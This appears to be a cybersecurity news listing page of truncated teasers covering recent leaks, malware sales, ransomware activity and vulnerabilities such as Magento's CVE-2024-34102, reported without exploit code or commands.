Recently, a Proof of Concept (POC) for a vulnerability identified as CVE-2024-34102, which affects the Magento and Adobe Commerce e-commerce platforms, has been found online. This vulnerability, detected by security experts from Assetnote, represents a significant threat as it allows for unauthenticated XML entity injection attacks. Vulnerability Description CVE-2024-34102 is an XML entity injection vulnerability that can be exploited before the authentication phase, making it particularly dangerous. E-commerce platforms like Magento and Adobe Commerce are widely used for managing online stores, and a flaw of this type could expose numerous sensitive data and compromise the security of the involved servers. Technical Details

A malicious actor has claimed to have obtained access to the complete source code of Cyberpunk 2077, the famous role-playing game developed by CD Projekt Red. If confirmed, this claim could have devastating consequences for the company and the entire gaming community. Threat Details According to a post on a hacking forum, a user identified as “alphahat” has claimed to possess the entire source code of Cyberpunk 2077, including development tools and the Red Engine 6 game engine. The post also includes links that purportedly lead to the stolen material and a Telegram contact for further details. Conclusion The claim of unauthorized

A malicious actor released sensitive data (presumably) belonging to COI Cooperation Portal, a sharing and collaborative environmente for non classified NATO documents. This comprehensive portal is dedicated to supporting NATO organizations, nations, and partners, along with public administrations and industries across PfP (Partnership for Peace) countries. The data leak seems to include a list of 362 members, including information like full name, email, organizzation and some non-classified documents. As usual everything have been posted on BreachForum from an user with natohub as alias. Breach’s Details Natohub posted a link that permits to download sample files without password. The sample data includes members

Introduction Xehook Stealer is a sophisticated malware targeting Windows operating systems, first discovered in January 2024. Within a year, Xehook has rapidly gained notoriety for its advanced data collection capabilities and support for over 110 cryptocurrencies and 2FA extensions. Starting today, the future of the project may undergo a significant change, as two sales announcements have been found for the project, one on the well-known forum xss.is and the other on its own Telegram channel. Technical Features Xehook Stealer is written in .NET and stands out for its dynamic data collection capabilities from Chromium and Gecko-based browsers. Key features include: Distribution Methods

On June 11, a Microsoft engineer inadvertently made 4GB of internal code related to Microsoft PlayReady public. The information leak occurred on the Microsoft Developer Community, a forum dedicated to developers. Details of the Information Leak The leaked material included: These components are crucial for content protection and digital rights management (DRM) within Microsoft platforms. The Construction of the PlayReady Library Researchers from the AG Security Research Lab successfully compiled the Windows PlayReady DLL library using the leaked code. Interestingly, a user from the Microsoft Developer Community provided step-by-step instructions on how to initiate the compilation process, further facilitating the researchers’ work.

On June 24, 2024, Wordfence revealed a supply chain attack on WordPress plugins, leading to the compromise of five plugins with malicious code. The affected plugins are: The malicious code aimed to create a new admin user and inject SEO spam into site footers. The compromised versions are no longer listed in the WordPress repository. Attack Details The attack was detected by Wordfence while analyzing the Social Warfare plugin, following a forum post by the WordPress Plugin Review team. Further investigation revealed that four more plugins were similarly compromised. The malware attempted to create an unauthorized admin account and send credentials to

In recent years, the cybersecurity landscape has been marked by ongoing ransomware attacks , with criminal groups constantly evolving to evade defenses. One such group, known as BlackByte, recently returned to action after months of inactivity, reviving its double extortion strategy and introducing a new Data Leak Site (DLS). Origins and Operational Methods of BlackByte Blackbyte DLS BlackByte emerged as a significant threat in July 2021, quickly attracting the attention of authorities such as the FBI and the US Secret Service. This group is known to exploit vulnerabilities in computer systems to gain unauthorized access and distribute their ransomware. One of the most common techniques used by BlackByte

Recently, Handala, a malicious actor, posted on a well-known dark web forum, claiming a cyber attack against Zerto, a subsidiary of Hewlett Packard Enterprise (HPE). Zerto is renowned for its advanced solutions for disaster recovery, ransomware resilience, and workload mobility, specifically designed for virtualized infrastructures and cloud environments. Handala (threat actor) attacked Zerto (one of the largest Zionist cybersecurity companies in the world).Zerto, a Hewlett Packard Enterprise company, enables customers to manage always-on business by simplifying the protection, recovery, and mobility of on-premises and cloud applications. Zerto’s cloud data management and protection platform eliminates the risks and complexity of modernization and cloud